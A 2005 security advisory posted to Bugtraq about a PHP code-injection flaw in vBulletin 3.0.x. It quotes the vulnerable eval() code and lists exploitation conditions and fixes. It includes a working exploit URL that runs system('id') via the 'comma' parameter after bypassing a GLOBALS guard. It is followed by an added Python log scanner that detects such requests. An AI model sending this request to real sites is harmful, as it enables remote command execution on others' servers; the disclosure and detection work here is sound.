Date: 13 Feb 2005 17:16:35 -0000
From: AL3NDALEEB <al3ndaleeb@....net>
To: bugtraq@...urityfocus.com
Subject: vbulletin 3.0.x PHP code execution




Vulnerable Systems:
 ----------------
 vBulletin version 3.0 up to and including version 3.0.4

 Immune systems:
 ----------------
 vBulletin version 3.0.5
 vBulletin version 3.0.6

 Vulnerable code in forumdisplay.php :
 #############################################################
 if ($vboptions['showforumusers'])
 {
    .
    .
    .
    .

 if ($bbuserinfo['userid'])
 {
    .
    .
    .
    .
    $comma = ', ';
  }
 .
 .
 .
 .
 while ($loggedin = $DB_site->fetch_array($forumusers))
 {
    .
    .
    .
    eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";');     <<==== (Vuln)
    $comma = ', ';
    .
    .
  }
 .
 .
 }

 #############################################################

 Conditions:
 ----------------
 1st condition   : $vboptions['showforumusers'] == True; the admin must set
showforumusers ON in the vBulletin options.
 2nd condition   : $bbuserinfo['userid'] == 0; you must be a visitor/guest.
 3rd condition   : $DB_site->fetch_array($forumusers) == True; when you
visit the forum, it must have at least one user shown in it.
 4th condition   : magic_quotes_gpc must be OFF.
 SPECIAL condition : you must bypass the unset($GLOBALS["$_arrykey"]) code in
init.php with the secret array GLOBALS[]=1 ;)))


 Solutions:
 ----------------
 * Disable showforumusers in the vBulletin options.
 * Add the following line before if ($vboptions['showforumusers']):
     $comma = '';

 Exploit:
 ----------------
Example:
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
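
For checking web server logs against the request pattern described above, here is an added example (not part of the original advisory): it flags forumdisplay.php requests that supply a GLOBALS or comma parameter. The log lines are constructed samples, and the function names and the assumption that forumdisplay.php has no legitimate request parameter named comma are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (not real traffic); the second carries the
# advisory's example request with the quotes percent-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Feb/2005:17:20:01 +0000] '
    '"GET /forumdisplay.php?f=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Feb/2005:17:21:44 +0000] '
    '"GET /forumdisplay.php?GLOBALS[]=1&f=2&comma=%22.system(%27id%27).%22 HTTP/1.1" 200 7301',
    '203.0.113.9 - - [13/Feb/2005:17:22:10 +0000] '
    '"GET /forum/forumdisplay.php?GLOBALS%5B%5D=1&f=3 HTTP/1.1" 200 6980',
    '203.0.113.7 - - [13/Feb/2005:17:23:02 +0000] '
    '"GET /showthread.php?t=10&comma=x HTTP/1.1" 200 4100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Request variables named in the advisory's conditions and example.
# Assumption: forumdisplay.php takes no legitimate parameter called "comma".
WATCHED = {"GLOBALS", "comma"}


def suspicious_params(log_line):
    """Return the watched parameter names present in a forumdisplay.php request."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    path, _, query = match.group(1).partition("?")
    if not path.endswith("/forumdisplay.php"):
        return []
    found = set()
    for name, _value in parse_qsl(query, keep_blank_values=True):
        # PHP treats "GLOBALS[]" and "GLOBALS[x]" as the array variable GLOBALS.
        base = name.split("[", 1)[0]
        if base in WATCHED:
            found.add(base)
    return sorted(found)


def scan(lines):
    """Return (line_number, watched_names) for every line that matches."""
    return [(n, names) for n, line in enumerate(lines, start=1)
            if (names := suspicious_params(line))]


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious parameters {names}")
```

Only query strings recorded in the access log are inspected; parameters sent in a POST body are not visible to this check.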

